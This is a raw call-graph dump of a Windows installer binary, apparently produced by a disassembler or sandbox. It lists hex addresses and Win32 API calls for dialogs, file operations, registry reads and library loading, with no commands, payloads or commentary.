SendMessageW 4621->4622 4623 4057f9 OleUninitialize 4622->4623 4623->4428 4624 4057c0 4624->4621 4640 401389 4624->4640 4626->4393 4644 4064d5 4627->4644 4630 403d73 4630->4391 4630->4394 4631 40656a RegQueryValueExW RegCloseKey 4631->4630 4632->4399 4633->4614 4635 4066a5 17 API calls 4634->4635 4636 4040b4 SetWindowTextW 4635->4636 4636->4617 4638 404628 4637->4638 4639 404619 SendMessageW 4637->4639 4638->4624 4639->4638 4642 401390 4640->4642 4641 4013fe 4641->4624 4642->4641 4643 4013cb MulDiv SendMessageW 4642->4643 4643->4642 4645 4064e4 4644->4645 4646 4064e8 4645->4646 4647 4064ed RegOpenKeyExW 4645->4647 4646->4630 4646->4631 4647->4646 4648->4443 4650 405fff 4649->4650 4653 406011 4649->4653 4652 40600c CharNextW 4650->4652 4650->4653 4651 406035 4651->4446 4651->4447 4652->4651 4653->4651 4654 405f64 CharNextW 4653->4654 4654->4653 4656 4069b4 FindClose 4655->4656 4657 4069bf 4655->4657 4656->4657 4657->4453 4658->4485 4659->4485 4660->4472 4662 406304 GetShortPathNameW 4661->4662 4663 4062de 4661->4663 4665 406423 4662->4665 4666 406319 4662->4666 4688 406158 GetFileAttributesW CreateFileW 4663->4688 4665->4488 4666->4665 4668 406321 wsprintfA 4666->4668 4667 4062e8 CloseHandle GetShortPathNameW 4667->4665 4669 4062fc 4667->4669 4670 4066a5 17 API calls 4668->4670 4669->4662 4669->4665 4671 406349 4670->4671 4689 406158 GetFileAttributesW CreateFileW 4671->4689 4673 406356 4673->4665 4674 406365 GetFileSize GlobalAlloc 4673->4674 4675 406387 4674->4675 4676 40641c CloseHandle 4674->4676 4677 4061db ReadFile 4675->4677 4676->4665 4678 40638f 4677->4678 4678->4676 4690 4060bd lstrlenA 4678->4690 4681 4063a6 lstrcpyA 4684 4063c8 4681->4684 4682 4063ba 4683 4060bd 4 API calls 4682->4683 4683->4684 4685 4063ff SetFilePointer 4684->4685 4686 40620a WriteFile 4685->4686 4687 406415 GlobalFree 4686->4687 4687->4676 4688->4667 4689->4673 4691 4060fe lstrlenA 4690->4691 4692 406106 4691->4692 4693 4060d7 lstrcmpiA 4691->4693 4692->4681 4692->4682 4693->4692 4694 4060f5 CharNextA 4693->4694 4694->4691 4696 403c90 4695->4696 4697 403c59 4696->4697 4698 403c95 FreeLibrary GlobalFree 4696->4698 4699 405d74 4697->4699 4698->4697 4698->4698 4700 40603f 18 API calls 4699->4700 4701 405d94 4700->4701 4702 405d9c DeleteFileW 4701->4702 4704 405db3 4701->4704 4703 403b71 OleUninitialize 4702->4703 4703->4281 4703->4282 4705 405ed3 4704->4705 4738 406668 lstrcpynW 4704->4738 4705->4703 4712 40699e 2 API calls 4705->4712 4707 405dd9 4708 405dec 4707->4708 4709 405ddf lstrcatW 4707->4709 4711 405f83 2 API calls 4708->4711 4710 405df2 4709->4710 4713 405e02 lstrcatW 4710->4713 4715 405e0d lstrlenW FindFirstFileW 4710->4715 4711->4710 4714 405ef8 4712->4714 4713->4715 4714->4703 4716 405efc 4714->4716 4715->4705 4724 405e2f 4715->4724 4717 405f37 3 API calls 4716->4717 4718 405f02 4717->4718 4720 405d2c 5 API calls 4718->4720 4719 405eb6 FindNextFileW 4722 405ecc FindClose 4719->4722 4719->4724 4723 405f0e 4720->4723 4722->4705 4725 405f12 4723->4725 4726 405f28 4723->4726 4724->4719 4733 405e77 4724->4733 4739 406668 lstrcpynW 4724->4739 4725->4703 4729 4056ca 24 API calls 4725->4729 4728 4056ca 24 API calls 4726->4728 4728->4703 4731 405f1f 4729->4731 4730 405d74 60 API calls 4730->4733 4732 406428 36 API calls 4731->4732 4735 405f26 4732->4735 4733->4719 4733->4730 4734 4056ca 24 API calls 4733->4734 4736 4056ca 24 API calls 4733->4736 4737 406428 36 API calls 4733->4737 4740 405d2c 4733->4740 4734->4719 4735->4703 4736->4733 4737->4733 4738->4707 4739->4724 4748 406133 GetFileAttributesW 4740->4748 4743 405d47 RemoveDirectoryW 4746 405d55 4743->4746 4744 405d4f DeleteFileW 4744->4746 4745 405d59 4745->4733 4746->4745 4747 405d65 SetFileAttributesW 4746->4747 4747->4745 4749 405d38 4748->4749 4750 406145 SetFileAttributesW 4748->4750 4749->4743 4749->4744 4749->4745 4750->4749 4751 401941 4752 401943 4751->4752 4757 402da6 4752->4757 4755 405d74 67 API calls 4756 401951 4755->4756 4758 402db2 4757->4758 4759 4066a5 17 API calls 4758->4759 4760 402dd3 4759->4760 4761 401948 4760->4761 4762 4068ef 5 API calls 4760->4762 4761->4755 4762->4761 4763 4015c1 4764 402da6 17 API calls 4763->4764 4765 4015c8 4764->4765 4766 405fe2 4 API calls 4765->4766 4778 4015d1 4766->4778 4767 401631 4769 401663 4767->4769 4770 401636 4767->4770 4768 405f64 CharNextW 4768->4778 4772 401423 24 API calls 4769->4772 4782 401423 4770->4782 4780 40165b 4772->4780 4775 405c16 2 API calls 4775->4778 4776 405c33 5 API calls 4776->4778 4777 40164a SetCurrentDirectoryW 4777->4780 4778->4767 4778->4768 4778->4775 4778->4776 4779 401617 GetFileAttributesW 4778->4779 4781 405b99 4 API calls 4778->4781 4779->4778 4781->4778 4783 4056ca 24 API calls 4782->4783 4784 401431 4783->4784 4785 406668 lstrcpynW 4784->4785 4785->4777 5348 401c43 5349 402d84 17 API calls 5348->5349 5350 401c4a 5349->5350 5351 402d84 17 API calls 5350->5351 5352 401c57 5351->5352 5353 402da6 17 API calls 5352->5353 5357 401c6c 5352->5357 5353->5357 5354 402da6 17 API calls 5358 401c7c 5354->5358 5355 401cd3 5360 402da6 17 API calls 5355->5360 5356 401c87 5359 402d84 17 API calls 5356->5359 5357->5354 5357->5358 5358->5355 5358->5356 5361 401c8c 5359->5361 5362 401cd8 5360->5362 5363 402d84 17 API calls 5361->5363 5364 402da6 17 API calls 5362->5364 5366 401c98 5363->5366 5365 401ce1 FindWindowExW 5364->5365 5369 401d03 5365->5369 5367 401cc3 SendMessageW 5366->5367 5368 401ca5 SendMessageTimeoutW 5366->5368 5367->5369 5368->5369 5377 4028c4 5378 4028ca 5377->5378 5379 4028d2 FindClose 5378->5379 5380 402c2a 5378->5380 5379->5380 4811 4040c5 4812 4040dd 4811->4812 4813 40423e 4811->4813 4812->4813 4814 4040e9 4812->4814 4815 40428f 4813->4815 4816 40424f GetDlgItem GetDlgItem 4813->4816 4817 4040f4 SetWindowPos 4814->4817 4818 404107 4814->4818 4820 4042e9 4815->4820 4830 401389 2 API calls 4815->4830 4819 4045c4 18 API calls 4816->4819 4817->4818 4822 404110 ShowWindow 4818->4822 4823 404152 4818->4823 4824 404279 SetClassLongW 4819->4824 4821 404610 SendMessageW 4820->4821 4837 404239 4820->4837 4853 4042fb 4821->4853 4825 404130 GetWindowLongW 4822->4825 4826 40422b 4822->4826 4827 404171 4823->4827 4828 40415a DestroyWindow 4823->4828 4829 40140b 2 API calls 4824->4829 4825->4826 4833 404149 ShowWindow 4825->4833 4893 40462b 4826->4893 4834 404176 SetWindowLongW 4827->4834 4835 404187 4827->4835 4883 40454d 4828->4883 4829->4815 4831 4042c1 4830->4831 4831->4820 4836 4042c5 SendMessageW 4831->4836 4833->4823 4834->4837 4835->4826 4840 404193 GetDlgItem 4835->4840 4836->4837 4838 40140b 2 API calls 4838->4853 4839 40454f DestroyWindow EndDialog 4839->4883 4842 4041c1 4840->4842 4843 4041a4 SendMessageW IsWindowEnabled 4840->4843 4841 40457e ShowWindow 4841->4837 4845 4041ce 4842->4845 4846 404215 SendMessageW 4842->4846 4847 4041e1 4842->4847 4857 4041c6 4842->4857 4843->4837 4843->4842 4844 4066a5 17 API calls 4844->4853 4845->4846 4845->4857 4846->4826 4850 4041e9 4847->4850 4851 4041fe 4847->4851 4849 4045c4 18 API calls 4849->4853 4854 40140b 2 API calls 4850->4854 4855 40140b 2 API calls 4851->4855 4852 4041fc 4852->4826 4853->4837 4853->4838 4853->4839 4853->4844 4853->4849 4874 40448f DestroyWindow 4853->4874 4884 4045c4 4853->4884 4854->4857 4856 404205 4855->4856 4856->4826 4856->4857 4890 40459d 4857->4890 4859 404376 GetDlgItem 4860 404393 ShowWindow KiUserCallbackDispatcher 4859->4860 4861 40438b 4859->4861 4887 4045e6 KiUserCallbackDispatcher 4860->4887 4861->4860 4863 4043bd EnableWindow 4868 4043d1 4863->4868 4864 4043d6 GetSystemMenu EnableMenuItem SendMessageW 4865 404406 SendMessageW 4864->4865 4864->4868 4865->4868 4867 4040a6 18 API calls 4867->4868 4868->4864 4868->4867 4888 4045f9 SendMessageW 4868->4888 4889 406668 lstrcpynW 4868->4889 4870 404435 lstrlenW 4871 4066a5 17 API calls 4870->4871 4872 40444b SetWindowTextW 4871->4872 4873 401389 2 API calls 4872->4873 4873->4853 4875 4044a9 CreateDialogParamW 4874->4875 4874->4883 4876 4044dc 4875->4876 4875->4883 4877 4045c4 18 API calls 4876->4877 4878 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4877->4878 4879 401389 2 API calls 4878->4879 4880 40452d 4879->4880 4880->4837 4881 404535 ShowWindow 4880->4881 4882 404610 SendMessageW 4881->4882 4882->4883 4883->4837 4883->4841 4885 4066a5 17 API calls 4884->4885 4886 4045cf SetDlgItemTextW 4885->4886 4886->4859 4887->4863 4888->4868 4889->4870 4891 4045a4 4890->4891 4892 4045aa SendMessageW 4890->4892 4891->4892 4892->4852 4894 4046ee 4893->4894 4895 404643 GetWindowLongW 4893->4895 4894->4837 4895->4894 4896 404658 4895->4896 4896->4894 4897 404685 GetSysColor 4896->4897 4898 404688 4896->4898 4897->4898 4899 404698 SetBkMode 4898->4899 4900 40468e SetTextColor 4898->4900 4901 4046b0 GetSysColor 4899->4901 4902 4046b6 4899->4902 4900->4899 4901->4902 4903 4046c7 4902->4903 4904 4046bd SetBkColor 4902->4904 4903->4894 4905 4046e1 CreateBrushIndirect 4903->4905 4906 4046da DeleteObject 4903->4906 4904->4903 4905->4894 4906->4905 5384 6db6103d 5387 6db6101b 5384->5387 5394 6db615b6 5387->5394 5389 6db61020 5390 6db61027 GlobalAlloc 5389->5390 5391 6db61024 5389->5391 5390->5391 5392 6db615dd 3 API calls 5391->5392 5393 6db6103b 5392->5393 5396 6db615bc 5394->5396 5395 6db615c2 5395->5389 5396->5395 5397 6db615ce GlobalFree 5396->5397 5397->5389 5398 4016cc 5399 402da6 17 API calls 5398->5399 5400 4016d2 GetFullPathNameW 5399->5400 5401 40170e 5400->5401 5402 4016ec 5400->5402 5403 401723 GetShortPathNameW 5401->5403 5404 402c2a 5401->5404 5402->5401 5405 40699e 2 API calls 5402->5405 5403->5404 5406 4016fe 5405->5406 5406->5401 5408 406668 lstrcpynW 5406->5408 5408->5401 5409 401e4e GetDC 5410 402d84 17 API calls 5409->5410 5411 401e60 GetDeviceCaps MulDiv ReleaseDC 5410->5411 5412 402d84 17 API calls 5411->5412 5413 401e91 5412->5413 5414 4066a5 17 API calls 5413->5414 5415 401ece CreateFontIndirectW 5414->5415 5416 402638 5415->5416 5417 402950 5418 402da6 17 API calls 5417->5418 5420 40295c 5418->5420 5419 402972 5422 406133 2 API calls 5419->5422 5420->5419 5421 402da6 17 API calls 5420->5421 5421->5419 5423 402978 5422->5423 5445 406158 GetFileAttributesW CreateFileW 5423->5445 5425 402985 5426 402a3b 5425->5426 5427 4029a0 GlobalAlloc 5425->5427 5428 402a23 5425->5428 5429 402a42 DeleteFileW 5426->5429 5430 402a55 5426->5430 5427->5428 5431 4029b9 5427->5431 5432 403371 44 API calls 5428->5432 5429->5430 5446 4035f8 SetFilePointer 5431->5446 5434 402a30 CloseHandle 5432->5434 5434->5426 5435 4029bf 5436 4035e2 ReadFile 5435->5436 5437 4029c8 GlobalAlloc 5436->5437 5438 4029d8 5437->5438 5439 402a0c 5437->5439 5440 403371 44 API calls 5438->5440 5441 40620a WriteFile 5439->5441 5444 4029e5 5440->5444 5442 402a18 GlobalFree 5441->5442 5442->5428 5443 402a03 GlobalFree 5443->5439 5444->5443 5445->5425 5446->5435 5454 403cd5 5455 403ce0 5454->5455 5456 403ce4 5455->5456 5457 403ce7 GlobalAlloc 5455->5457 5457->5456 5458 401956 5459 402da6 17 API calls 5458->5459 5460 40195d lstrlenW 5459->5460 5461 402638 5460->5461 5111 4014d7 5112 402d84 17 API calls 5111->5112 5113 4014dd Sleep 5112->5113 5115 402c2a 5113->5115 5116 4020d8 5117 40219c 5116->5117 5118 4020ea 5116->5118 5121 401423 24 API calls 5117->5121 5119 402da6 17 API calls 5118->5119 5120 4020f1 5119->5120 5122 402da6 17 API calls 5120->5122 5127 4022f6 5121->5127 5123 4020fa 5122->5123 5124 402110 LoadLibraryExW 5123->5124 5125 402102 GetModuleHandleW 5123->5125 5124->5117 5126 402121 5124->5126 5125->5124 5125->5126 5139 406aa4 5126->5139 5130 402132 5133 402151 5130->5133 5134 40213a 5130->5134 5131 40216b 5132 4056ca 24 API calls 5131->5132 5136 402142 5132->5136 5144 6db61817 5133->5144 5135 401423 24 API calls 5134->5135 5135->5136 5136->5127 5137 40218e FreeLibrary 5136->5137 5137->5127 5186 40668a WideCharToMultiByte 5139->5186 5141 406ac1 5142 406ac8 GetProcAddress 5141->5142 5143 40212c 5141->5143 5142->5143 5143->5130 5143->5131 5145 6db6184a 5144->5145 5187 6db61bff 5145->5187 5147 6db61851 5148 6db61976 5147->5148 5149 6db61862 5147->5149 5150 6db61869 5147->5150 5148->5136 5235 6db6243e 5149->5235 5219 6db62480 5150->5219 5155 6db618af 5248 6db62655 5155->5248 5156 6db618cd 5159 6db618d3 5156->5159 5160 6db6191e 5156->5160 5157 6db6187f 5162 6db61885 5157->5162 5163 6db61890 5157->5163 5158 6db61898 5170 6db6188e 5158->5170 5245 6db62e23 5158->5245 5267 6db61666 5159->5267 5167 6db62655 10 API calls 5160->5167 5162->5170 5229 6db62b98 5162->5229 5239 6db62810 5163->5239 5177 6db6190f 5167->5177 5168 6db618b5 5259 6db61654 5168->5259 5170->5155 5170->5156 5174 6db61896 5174->5170 5175 6db62655 10 API calls 5175->5177 5185 6db61965 5177->5185 5273 6db62618 5177->5273 5179 6db6196f GlobalFree 5179->5148 5182 6db61951 5182->5185 5277 6db615dd wsprintfW 5182->5277 5183 6db6194a FreeLibrary 5183->5182 5185->5148 5185->5179 5186->5141 5280 6db612bb GlobalAlloc 5187->5280 5189 6db61c26 5281 6db612bb GlobalAlloc 5189->5281 5191 6db61e6b GlobalFree GlobalFree GlobalFree 5192 6db61e88 5191->5192 5205 6db61ed2 5191->5205 5193 6db6227e 5192->5193 5200 6db61e9d 5192->5200 5192->5205 5195 6db622a0 GetModuleHandleW 5193->5195 5193->5205 5194 6db61d26 GlobalAlloc 5211 6db61c31 5194->5211 5197 6db622c6 5195->5197 5198 6db622b1 LoadLibraryW 5195->5198 5196 6db61d8f GlobalFree 5196->5211 5288 6db616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5197->5288 5198->5197 5198->5205 5199 6db61d71 lstrcpyW 5202 6db61d7b lstrcpyW 5199->5202 5200->5205 5284 6db612cc 5200->5284 5202->5211 5203 6db62318 5203->5205 5208 6db62325 lstrlenW 5203->5208 5204 6db62126 5287 6db612bb GlobalAlloc 5204->5287 5205->5147 5289 6db616bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5208->5289 5209 6db622d8 5209->5203 5217 6db62302 GetProcAddress 5209->5217 5211->5191 5211->5194 5211->5196 5211->5199 5211->5202 5211->5204 5211->5205 5212 6db62067 GlobalFree 5211->5212 5213 6db621ae 5211->5213 5214 6db612cc 2 API calls 5211->5214 5282 6db6162f GlobalSize GlobalAlloc 5211->5282 5212->5211 5213->5205 5216 6db62216 lstrcpyW 5213->5216 5214->5211 5216->5205 5217->5203 5218 6db6212f 5218->5147 5226 6db62498 5219->5226 5220 6db612cc GlobalAlloc lstrcpynW 5220->5226 5222 6db625c1 GlobalFree 5223 6db6186f 5222->5223 5222->5226 5223->5157 5223->5158 5223->5170 5224 6db62540 GlobalAlloc WideCharToMultiByte 5224->5222 5225 6db6256b GlobalAlloc CLSIDFromString 5225->5222 5226->5220 5226->5222 5226->5224 5226->5225 5228 6db6258a 5226->5228 5291 6db6135a 5226->5291 5228->5222 5295 6db627a4 5228->5295 5231 6db62baa 5229->5231 5230 6db62c4f EnumWindows 5234 6db62c6d 5230->5234 5231->5230 5233 6db62d39 5233->5170 5298 6db62b42 5234->5298 5236 6db62453 5235->5236 5237 6db6245e GlobalAlloc 5236->5237 5238 6db61868 5236->5238 5237->5236 5238->5150 5243 6db62840 5239->5243 5240 6db628ee 5242 6db628f4 GlobalSize 5240->5242 5244 6db628fe 5240->5244 5241 6db628db GlobalAlloc 5241->5244 5242->5244 5243->5240 5243->5241 5244->5174 5246 6db62e2e 5245->5246 5247 6db62e6e GlobalFree 5246->5247 5302 6db612bb GlobalAlloc 5248->5302 5250 6db626fa StringFromGUID2 5257 6db6265f 5250->5257 5251 6db6270b lstrcpynW 5251->5257 5252 6db626d8 MultiByteToWideChar 5252->5257 5253 6db6271e wsprintfW 5253->5257 5254 6db62742 GlobalFree 5254->5257 5255 6db62777 GlobalFree 5255->5168 5256 6db61312 2 API calls 5256->5257 5257->5250 5257->5251 5257->5252 5257->5253 5257->5254 5257->5255 5257->5256 5303 6db61381 5257->5303 5307 6db612bb GlobalAlloc 5259->5307 5261 6db61659 5262 6db61666 2 API calls 5261->5262 5263 6db61663 5262->5263 5264 6db61312 5263->5264 5265 6db61355 GlobalFree 5264->5265 5266 6db6131b GlobalAlloc lstrcpynW 5264->5266 5265->5177 5266->5265 5268 6db61672 wsprintfW 5267->5268 5271 6db6169f lstrcpyW 5267->5271 5272 6db616b8 5268->5272 5271->5272 5272->5175 5274 6db62626 5273->5274 5275 6db61931 5273->5275 5274->5275 5276 6db62642 GlobalFree 5274->5276 5275->5182 5275->5183 5276->5274 5278 6db61312 2 API calls 5277->5278 5279 6db615fe 5278->5279 5279->5185 5280->5189 5281->5211 5283 6db6164d 5282->5283 5283->5211 5290 6db612bb GlobalAlloc 5284->5290 5286 6db612db lstrcpynW 5286->5205 5287->5218 5288->5209 5289->5205 5290->5286 5292 6db61361 5291->5292 5293 6db612cc 2 API calls 5292->5293 5294 6db6137f 5293->5294 5294->5226 5296 6db627b2 VirtualAlloc 5295->5296 5297 6db62808 5295->5297 5296->5297 5297->5228 5299 6db62b4d 5298->5299 5300 6db62b52 GetLastError 5299->5300 5301 6db62b5d 5299->5301 5300->5301 5301->5233 5302->5257 5304 6db613ac 5303->5304 5305 6db6138a 5303->5305 5304->5257 5305->5304 5306 6db61390 lstrcpyW 5305->5306 5306->5304 5307->5261 5462 402b59 5463 402b60 5462->5463 5464 402bab 5462->5464 5467 402d84 17 API calls 5463->5467 5469 402ba9 5463->5469 5465 406a35 5 API calls 5464->5465 5466 402bb2 5465->5466 5468 402da6 17 API calls 5466->5468 5470 402b6e 5467->5470 5471 402bbb 5468->5471 5472 402d84 17 API calls 5470->5472 5471->5469 5473 402bbf IIDFromString 5471->5473 5475 402b7a 5472->5475 5473->5469 5474 402bce 5473->5474 5474->5469 5480 406668 lstrcpynW 5474->5480 5479 4065af wsprintfW 5475->5479 5478 402beb CoTaskMemFree 5478->5469 5479->5469 5480->5478 5481 402a5b 5482 402d84 17 API calls 5481->5482 5483 402a61 5482->5483 5484 402aa4 5483->5484 5485 402a88 5483->5485 5494 40292e 5483->5494 5486 402abe 5484->5486 5487 402aae 5484->5487 5488 402a9e 5485->5488 5491 402a8d 5485->5491 5490 4066a5 17 API calls 5486->5490 5489 402d84 17 API calls 5487->5489 5496 4065af wsprintfW 5488->5496 5489->5494 5490->5494 5495 406668 lstrcpynW 5491->5495 5495->5494 5496->5494 5322 40175c 5323 402da6 17 API calls 5322->5323 5324 401763 5323->5324 5325 406187 2 API calls 5324->5325 5326 40176a 5325->5326 5327 406187 2 API calls 5326->5327 5327->5326 5497 401d5d 5498 402d84 17 API calls 5497->5498 5499 401d6e SetWindowLongW 5498->5499 5500 402c2a 5499->5500 5328 401ede 5329 402d84 17 API calls 5328->5329 5330 401ee4 5329->5330 5331 402d84 17 API calls 5330->5331 5332 401ef0 5331->5332 5333 401f07 EnableWindow 5332->5333 5334 401efc ShowWindow 5332->5334 5335 402c2a 5333->5335 5334->5335 5501 4028de 5502 4028e6 5501->5502 5503 4028ea FindNextFileW 5502->5503 5506 4028fc 5502->5506 5504 402943 5503->5504 5503->5506 5507 406668 lstrcpynW 5504->5507 5507->5506 5508 406d5f 5509 406be3 5508->5509 5510 40754e 5509->5510 5511 406c64 GlobalFree 5509->5511 5512 406c6d GlobalAlloc 5509->5512 5513 406ce4 GlobalAlloc 5509->5513 5514 406cdb GlobalFree 5509->5514 5511->5512 5512->5509 5512->5510 5513->5509 5513->5510 5514->5513 5515 401563 5516 402ba4 5515->5516 5519 4065af wsprintfW 5516->5519 5518 402ba9 5519->5518 5527 401968 5528 402d84 17 API calls 5527->5528 5529 40196f 5528->5529 5530 402d84 17 API calls 5529->5530 5531 40197c 5530->5531 5532 402da6 17 API calls 5531->5532 5533 401993 lstrlenW 5532->5533 5534 4019a4 5533->5534 5535 4019e5 5534->5535 5539 406668 lstrcpynW 5534->5539 5537 4019d5 5537->5535 5538 4019da lstrlenW 5537->5538 5538->5535 5539->5537 5540 40166a 5541 402da6 17 API calls 5540->5541 5542 401670 5541->5542 5543 40699e 2 API calls 5542->5543 5544 401676 5543->5544 5545 402aeb 5546 402d84 17 API calls 5545->5546 5547 402af1 5546->5547 5548 4066a5 17 API calls 5547->5548 5549 40292e 5547->5549 5548->5549 5005 4026ec 5006 402d84 17 API calls 5005->5006 5008 4026fb 5006->5008 5007 402838 5008->5007 5009 402745 ReadFile 5008->5009 5010 4027de 5008->5010 5011 4061db ReadFile 5008->5011 5013 402785 MultiByteToWideChar 5008->5013 5014 40283a 5008->5014 5016 4027ab SetFilePointer MultiByteToWideChar 5008->5016 5017 40284b 5008->5017 5009->5007 5009->5008 5010->5007 5010->5008 5019 406239 SetFilePointer 5010->5019 5011->5008 5013->5008 5028 4065af wsprintfW 5014->5028 5016->5008 5017->5007 5018 40286c SetFilePointer 5017->5018 5018->5007 5020 406255 5019->5020 5021 40626d 5019->5021 5022 4061db ReadFile 5020->5022 5021->5010 5023 406261 5022->5023 5023->5021 5024 406276 SetFilePointer 5023->5024 5025 40629e SetFilePointer 5023->5025 5024->5025 5026 406281 5024->5026 5025->5021 5027 40620a WriteFile 5026->5027 5027->5021 5028->5007 5550 404a6e 5551 404aa4 5550->5551 5552 404a7e 5550->5552 5554 40462b 8 API calls 5551->5554 5553 4045c4 18 API calls 5552->5553 5555 404a8b SetDlgItemTextW 5553->5555 5556 404ab0 5554->5556 5555->5551 5029 40176f 5030 402da6 17 API calls 5029->5030 5031 401776 5030->5031 5032 401796 5031->5032 5033 40179e 5031->5033 5069 406668 lstrcpynW 5032->5069 5070 406668 lstrcpynW 5033->5070 5036 40179c 5039 4068ef 5 API calls 5036->5039 5037 4017a9 5038 405f37 3 API calls 5037->5038 5040 4017af lstrcatW 5038->5040 5048 4017bb 5039->5048 5040->5036 5041 40699e 2 API calls 5041->5048 5042 4017f7 5043 406133 2 API calls 5042->5043 5043->5048 5045 4017cd CompareFileTime 5045->5048 5046 40188d 5047 4056ca 24 API calls 5046->5047 5049 401897 5047->5049 5048->5041 5048->5042 5048->5045 5048->5046 5051 406668 lstrcpynW 5048->5051 5056 4066a5 17 API calls 5048->5056 5063 405cc8 MessageBoxIndirectW 5048->5063 5067 401864 5048->5067 5068 406158 GetFileAttributesW CreateFileW 5048->5068 5052 403371 44 API calls 5049->5052 5050 4056ca 24 API calls 5053 401879 5050->5053 5051->5048 5054 4018aa 5052->5054 5055 4018be SetFileTime 5054->5055 5057 4018d0 CloseHandle 5054->5057 5055->5057 5056->5048 5057->5053 5058 4018e1 5057->5058 5059 4018e6 5058->5059 5060 4018f9 5058->5060 5061 4066a5 17 API calls 5059->5061 5062 4066a5 17 API calls 5060->5062 5064 4018ee lstrcatW 5061->5064 5065 401901 5062->5065 5063->5048 5064->5065 5065->5053 5066 405cc8 MessageBoxIndirectW 5065->5066 5066->5053 5067->5050 5067->5053 5068->5048 5069->5036 5070->5037 5557 401a72 5558 402d84 17 API calls 5557->5558 5559 401a7b 5558->5559 5560 402d84 17 API calls 5559->5560 5561 401a20 5560->5561 5562 401573 5563 401583 ShowWindow 5562->5563 5564 40158c 5562->5564 5563->5564 5565 402c2a 5564->5565 5566 40159a ShowWindow 5564->5566 5566->5565 5567 4023f4 5568 402da6 17 API calls 5567->5568 5569 402403 5568->5569 5570 402da6 17 API calls 5569->5570 5571 40240c 5570->5571 5572 402da6 17 API calls 5571->5572 5573 402416 GetPrivateProfileStringW 5572->5573 5574 4014f5 SetForegroundWindow 5575 402c2a 5574->5575 5576 6db61000 5577 6db6101b 5 API calls 5576->5577 5578 6db61019 5577->5578 5579 401ff6 5580 402da6 17 API calls 5579->5580 5581 401ffd 5580->5581 5582 40699e 2 API calls 5581->5582 5583 402003 5582->5583 5585 402014 5583->5585 5586 4065af wsprintfW 5583->5586 5586->5585 5587 401b77 5588 402da6 17 API calls 5587->5588 5589 401b7e 5588->5589 5590 402d84 17 API calls 5589->5590 5591 401b87 wsprintfW 5590->5591 5592 402c2a 5591->5592 5593 4046fa lstrcpynW lstrlenW 5308 40167b 5309 402da6 17 API calls 5308->5309 5310 401682 5309->5310 5311 402da6 17 API calls 5310->5311 5312 40168b 5311->5312 5313 402da6 17 API calls 5312->5313 5314 401694 MoveFileW 5313->5314 5315 4016a0 5314->5315 5316 4016a7 5314->5316 5317 401423 24 API calls 5315->5317 5318 40699e 2 API calls 5316->5318 5320 4022f6 5316->5320 5317->5320 5319 4016b6 5318->5319 5319->5320 5321 406428 36 API calls 5319->5321 5321->5315 5594 6db6170d 5595 6db615b6 GlobalFree 5594->5595 5597 6db61725 5595->5597 5596 6db6176b GlobalFree 5597->5596 5598 6db61740 5597->5598 5599 6db61757 VirtualFree 5597->5599 5598->5596 5599->5596 5607 4022ff 5608 402da6 17 API calls 5607->5608 5609 402305 5608->5609 5610 402da6 17 API calls 5609->5610 5611 40230e 5610->5611 5612 402da6 17 API calls 5611->5612 5613 402317 5612->5613 5614 40699e 2 API calls 5613->5614 5615 402320 5614->5615 5616 402331 lstrlenW lstrlenW 5615->5616 5617 402324 5615->5617 5619 4056ca 24 API calls 5616->5619 5618 4056ca 24 API calls 5617->5618 5621 40232c 5617->5621 5618->5621 5620 40236f SHFileOperationW 5619->5620 5620->5617 5620->5621 5622 4019ff 5623 402da6 17 API calls 5622->5623 5624 401a06 5623->5624 5625 402da6 17 API calls 5624->5625 5626 401a0f 5625->5626 5627 401a16 lstrcmpiW 5626->5627 5628 401a28 lstrcmpW 5626->5628 5629 401a1c 5627->5629 5628->5629 5630 401000 5631 401037 BeginPaint GetClientRect 5630->5631 5633 40100c DefWindowProcW 5630->5633 5634 4010f3 5631->5634 5635 401179 5633->5635 5636 401073 CreateBrushIndirect FillRect DeleteObject 5634->5636 5637 4010fc 5634->5637 5636->5634 5638 401102 CreateFontIndirectW 5637->5638 5639 401167 EndPaint 5637->5639 5638->5639 5640 401112 6 API calls 5638->5640 5639->5635 5640->5639 5641 401d81 5642 401d94 GetDlgItem 5641->5642 5643 401d87 5641->5643 5646 401d8e 5642->5646 5644 402d84 17 API calls 5643->5644 5644->5646 5645 401dd5 GetClientRect LoadImageW SendMessageW 5649 401e33 5645->5649 5651 401e3f 5645->5651 5646->5645 5647 402da6 17 API calls 5646->5647 5647->5645 5650 401e38 DeleteObject 5649->5650 5649->5651 5650->5651 5652 6db61774 5653 6db617a3 5652->5653 5654 6db61bff 22 API calls 5653->5654 5655 6db617aa 5654->5655 5656 6db617b1 5655->5656 5657 6db617bd 5655->5657 5658 6db61312 2 API calls 5656->5658 5659 6db617c7 5657->5659 5660 6db617e4 5657->5660 5663 6db617bb 5658->5663 5664 6db615dd 3 API calls 5659->5664 5661 6db6180e 5660->5661 5662 6db617ea 5660->5662 5666 6db615dd 3 API calls 5661->5666 5665 6db61654 3 API calls 5662->5665 5667 6db617cc 5664->5667 5668 6db617ef 5665->5668 5666->5663 5669 6db61654 3 API calls 5667->5669 5670 6db61312 2 API calls 5668->5670 5671 6db617d2 5669->5671 5672 6db617f5 GlobalFree 5670->5672 5673 6db61312 2 API calls 5671->5673 5672->5663 5675 6db61809 GlobalFree 5672->5675 5674 6db617d8 GlobalFree 5673->5674 5674->5663 5675->5663 5676 401503 5677 40150b 5676->5677 5679 40151e 5676->5679 5678 402d84 17 API calls 5677->5678 5678->5679 5680 404783 5681 40479b 5680->5681 5684 4048b5 5680->5684 5685 4045c4 18 API calls 5681->5685 5682 40491f 5683 404929 GetDlgItem 5682->5683 5686 4049e9 5682->5686 5687 404943 5683->5687 5688 4049aa 5683->5688 5684->5682 5684->5686 5689 4048f0 GetDlgItem SendMessageW 5684->5689 5690 404802 5685->5690 5691 40462b 8 API calls 5686->5691 5687->5688 5696 404969 SendMessageW LoadCursorW SetCursor 5687->5696 5688->5686 5692 4049bc 5688->5692 5713 4045e6 KiUserCallbackDispatcher 5689->5713 5694 4045c4 18 API calls 5690->5694 5695 4049e4 5691->5695 5697 4049d2 5692->5697 5698 4049c2 SendMessageW 5692->5698 5700 40480f CheckDlgButton 5694->5700 5717 404a32 5696->5717 5697->5695 5703 4049d8 SendMessageW 5697->5703 5698->5697 5699 40491a 5714 404a0e 5699->5714 5711 4045e6 KiUserCallbackDispatcher 5700->5711 5703->5695 5706 40482d GetDlgItem 5712 4045f9 SendMessageW 5706->5712 5708 404843 SendMessageW 